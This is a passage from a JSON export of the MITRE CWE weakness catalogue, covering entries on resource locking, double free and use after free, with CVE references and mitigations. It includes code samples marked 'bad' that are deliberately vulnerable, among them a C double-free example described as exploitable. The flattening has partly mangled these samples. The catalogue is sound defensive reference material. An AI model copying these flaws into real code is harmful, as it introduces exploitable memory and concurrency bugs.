{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//attempt to get logfile lock","xhtml:div":[{"#text":"fwrite($logfile,$message);flock($logfile, LOCK_UN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// unlock logfile"},{"#text":"print \\"Could not obtain lock on logFile.log, message not recorded\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},"xhtml:br":""}},"Body_Text":"PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock()."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-0682","Description":"Program can not execute when attacker obtains a mutex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682"},{"Reference":"CVE-2002-1914","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914"},{"Reference":"CVE-2002-1915","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915"},{"Reference":"CVE-2002-0051","Description":"Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051"},{"Reference":"CVE-2000-0338","Description":"Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338"},{"Reference":"CVE-2000-1198","Description":"Chain: Lock files with predictable names. Resultant from randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198"},{"Reference":"CVE-2002-1869","Description":"Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Unrestricted Critical Resource Lock"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Deadlock"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A9","Entry_Name":"Denial of Service","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK00-J","Entry_Name":"Use private final lock objects to synchronize classes that may interact with untrusted code"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK07-J","Entry_Name":"Avoid deadlock by requesting and releasing locks in the same order"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP22","Entry_Name":"Unrestricted lock"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"25"}}},"Notes":{"Note":{"#text":"This overlaps Insufficient Resource Pool when the \\"pool\\" is of size 1. It can also be resultant from race conditions, although the timing window could be quite large in some cases.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Detection_Factors, Relationships, Observed_Example, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Importance":"Critical","Modification_Comment":"Suggested a better name and the minimal relationship with resources regardless of their criticality."},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Added a White_Box_Definition and clarified the consequences."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences, Description, Name, Potential_Mitigations, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Relationships, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Contribution":{"attr":{"@_Type":"Feedback"},"Contribution_Organization":"KDM Analytics","Contribution_Date":"2008-08-29","Contribution_Comment":"suggested clarification of description and observed examples, which were vague and inconsistent."},"Previous_Entry_Name":[{"#text":"Unrestricted Critical Resource Lock","attr":{"@_Date":"2008-04-11"}},{"#text":"Unrestricted Lock on Critical Resource","attr":{"@_Date":"2009-07-27"}}]}},"413":{"attr":{"@_ID":"413","@_Name":"Improper Resource Locking","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not lock or does not correctly lock a resource when the software must have exclusive access to the resource.","Extended_Description":"When a resource is not properly locked, an attacker could modify the resource while it is being operated on by the software. This might violate the software\'s assumption that the resource will not change, potentially leading to unexpected behaviors.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Use a non-conflicting privilege scheme."},{"Phase":["Architecture and Design","Implementation"],"Description":"Use synchronization when locking a resource."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"Intro_Text":"This Java example shows a simple BankAccount class with deposit and withdraw methods.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"private double accountBalance;public BankAccount() {}public void deposit(double depositAmount) {}public void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","","","","","","","","",""],"xhtml:i":["// variable for bank account balance","// constructor for BankAccount","// method to deposit amount into BankAccount","// method to withdraw amount from BankAccount","// other methods for accessing the BankAccount object"],"xhtml:div":[{"#text":"accountBalance = 0;","attr":{"@_style":"margin-left:10px;"}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance + depositAmount;accountBalance = newBalance;","xhtml:br":["",""]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = accountBalance - withdrawAmount;accountBalance = newBalance;","xhtml:br":["",""]}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...public synchronized void deposit(double depositAmount) {}public synchronized void withdraw(double withdrawAmount) {}...","xhtml:br":["","","","","","",""],"xhtml:i":["// synchronized method to deposit amount into BankAccount","// synchronized method to withdraw amount from BankAccount"],"xhtml:div":[{"#text":"...","attr":{"@_style":"margin-left:10px;"}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"public class BankAccount {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...private ReentrantLock balanceChangeLock;private Condition sufficientFundsCondition;public void deposit(double amount) {}public void withdraw(double amount) {}...","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["// lock object for thread access to methods","// condition object to temporarily release lock to other threads","// method to deposit amount into BankAccount","// method to withdraw amount from bank account"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"balanceChangeLock.lock();try {} catch (Exception e) {...}finally {}","xhtml:br":["","","",""],"xhtml:i":"// set lock to block access to BankAccount from other threads","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"double newBalance = balance + amount;balance = newBalance;sufficientFundsCondition.signalAll();","xhtml:br":["","","","",""],"xhtml:i":"// inform other threads that funds are available"}},{"#text":"// unlock lock objectbalanceChangeLock.unlock();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"balanceChangeLock.lock();try {} catch (Exception e) {...}finally {}","xhtml:br":["","","",""],"xhtml:i":"// set lock to block access to BankAccount from other threads","xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"while (balance < amount) {}double newBalance = balance - amount;balance = newBalance;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"sufficientFundsCondition.await();","xhtml:br":["","","",""],"xhtml:i":["// temporarily unblock access","// until sufficient funds are available"]}},"xhtml:br":["","",""]}},{"#text":"// unlock lock objectbalanceChangeLock.unlock();","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}]}}}}],"Body_Text":["However, the deposit and withdraw methods have shared access to the account balance private class variable. This can result in a race condition if multiple threads attempt to call the deposit and withdraw methods simultaneously where the account balance is modified by one thread before another thread has completed modifying the account balance. For example, if a thread attempts to withdraw funds using the withdraw method before another thread that is depositing funds using the deposit method completes the deposit then there may not be sufficient funds for the withdraw transaction.","To prevent multiple threads from having simultaneous access to the account balance variable the deposit and withdraw methods should be synchronized using the synchronized modifier.","An alternative solution is to use a lock object to ensure exclusive access to the bank account balance variable. As shown below, the deposit and withdraw methods use the lock object to set a lock to block access to the BankAccount object from other threads until the method has completed updating the bank account balance variable."]}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Insufficient Resource Locking"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK00-J","Entry_Name":"Use private final lock objects to synchronize classes that may interact with untrusted code"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Contribution":{"attr":{"@_Type":"Content"},"Contribution_Name":"Martin Sebor","Contribution_Organization":"Cisco Systems, Inc.","Contribution_Date":"2010-04-30","Contribution_Comment":"Provided Demonstrative Example"},"Previous_Entry_Name":{"#text":"Insufficient Resource Locking","attr":{"@_Date":"2010-09-27"}}}},"414":{"attr":{"@_ID":"414","@_Name":"Missing Lock Check","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"A product does not check to see if a lock is present before performing sensitive operations on a resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"667","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Availability"],"Impact":["Modify Application Data","DoS: Instability","DoS: Crash, Exit, or Restart"]}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Implement a reliable lock mechanism."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2004-1056","Description":"Product does not properly check if a lock is present, allowing other attackers to access functionality.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1056"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Missing Lock Check"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"}]}},"415":{"attr":{"@_ID":"415","@_Name":"Double Free","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls free() twice on the same memory address, potentially leading to modification of unexpected memory locations.","Extended_Description":"When a program calls free() twice with the same argument, the program\'s memory management data structures become corrupted. This corruption can cause the program to crash or, in some circumstances, cause two later calls to malloc() to return the same pointer. If malloc() returns the same value twice and the program later gives the attacker control over the data that is written into this doubly-allocated memory, the program becomes vulnerable to a buffer overflow attack.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"825","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1341","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"672","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"416","@_View_ID":"1000"}},{"attr":{"@_Nature":"PeerOf","@_CWE_ID":"123","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Alternate_Terms":{"Alternate_Term":{"Term":"Double-free"}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Memory","Execute Unauthorized Code or Commands"],"Note":"Doubly freeing memory may result in a write-what-where condition, allowing an attacker to execute arbitrary code."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Choose a language that provides automatic memory management."},{"Phase":"Implementation","Description":"Ensure that each allocation is freed only once. After freeing a chunk, set the pointer to NULL to ensure the pointer cannot be freed again. In complicated error conditions, be sure that clean-up routines respect the state of allocation properly. If the language is object oriented, ensure that object destructors delete each chunk of memory only once."},{"Phase":"Implementation","Description":"Use a static analysis tool to find double free instances."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code shows a simple example of a double free vulnerability.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char* ptr = (char*)malloc (SIZE);...if (abrt) {}...free(ptr);","xhtml:br":["","","",""],"xhtml:div":{"#text":"free(ptr);","attr":{"@_style":"margin-left:10px;"}}}},"Body_Text":["Double free vulnerabilities have two common (and sometimes overlapping) causes:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Error conditions and other exceptional circumstances"},{"xhtml:div":"Confusion over which part of the program is responsible for freeing the memory"}]}},"Although some double free vulnerabilities are not much more complicated than the previous example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once."]},{"Intro_Text":"While contrived, this code should be exploitable on Linux distributions which do not ship with heap-chunk check summing turned on.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include <stdio.h>#include <unistd.h>#define BUFSIZE1 512#define BUFSIZE2 ((BUFSIZE1/2) - 8)int main(int argc, char **argv) {}","xhtml:br":["","","","",""],"xhtml:div":{"#text":"char *buf1R1;char *buf2R1;char *buf1R2;buf1R1 = (char *) malloc(BUFSIZE2);buf2R1 = (char *) malloc(BUFSIZE2);free(buf1R1);free(buf2R1);buf1R2 = (char *) malloc(BUFSIZE1);strncpy(buf1R2, argv[1], BUFSIZE1-1);free(buf2R1);free(buf1R2);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","","","","","",""]}}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2006-5051","Description":"Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5051"},{"Reference":"CVE-2004-0642","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0642"},{"Reference":"CVE-2004-0772","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0772"},{"Reference":"CVE-2005-1689","Description":"Double free resultant from certain error conditions.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1689"},{"Reference":"CVE-2003-0545","Description":"Double free from invalid ASN.1 encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0545"},{"Reference":"CVE-2003-1048","Description":"Double free from malformed GIF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1048"},{"Reference":"CVE-2005-0891","Description":"Double free from malformed GIF.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0891"},{"Reference":"CVE-2002-0059","Description":"Double free from malformed compressed data.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0059"}]},"Affected_Resources":{"Affected_Resource":"Memory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"DFREE - Double-Free Vulnerability"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Double Free"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Doubly freeing memory"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM00-C","Entry_Name":"Allocate and free memory in the same module, at the same level of abstraction"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM01-C","Entry_Name":"Store a new value in pointers immediately after free()"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM31-C","Entry_Name":"Free dynamically allocated memory exactly once"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP12","Entry_Name":"Faulty Memory Release"}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":""Sin 8: C++ Catastrophes." Page 143"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Double Frees", Page 379"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Notes":{"Note":[{"#text":"This is usually resultant from another weakness, such as an unhandled error or race condition between threads. It could also be primary to weaknesses such as buffer overflows.","attr":{"@_Type":"Relationship"}},{"#text":"It could be argued that Double Free would be most appropriately located as a child of \\"Use after Free\\", but \\"Use\\" and \\"Release\\" are considered to be distinct operations within vulnerability theory, therefore this is more accurately \\"Release of a Resource after Expiration or Release\\", which doesn\'t exist yet.","attr":{"@_Type":"Theoretical"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings, White_Box_Definitions"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Theoretical_Notes"}]}},"416":{"attr":{"@_ID":"416","@_Name":"Use After Free","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Stable"},"Description":"Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.","Extended_Description":{"xhtml:p":["The use of previously-freed memory can have any number of adverse consequences, ranging from the corruption of valid data to the execution of arbitrary code, depending on the instantiation and timing of the flaw. The simplest way data corruption may occur involves the system\'s reuse of the freed memory. Use-after-free errors have two common and sometimes overlapping causes:","In this scenario, the memory in question is allocated to another pointer validly at some point after it has been freed. The original pointer to the freed memory is used again and points to somewhere within the new allocation. As the data is changed, it corrupts the validly used memory; this induces undefined behavior in the process.","If the newly allocated data chances to hold a class, in C++ for example, various function pointers may be scattered within the heap data. If one of these function pointers is overwritten with an address to valid shellcode, execution of arbitrary code can be achieved."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Error conditions and other exceptional circumstances.","Confusion over which part of the program is responsible for freeing the 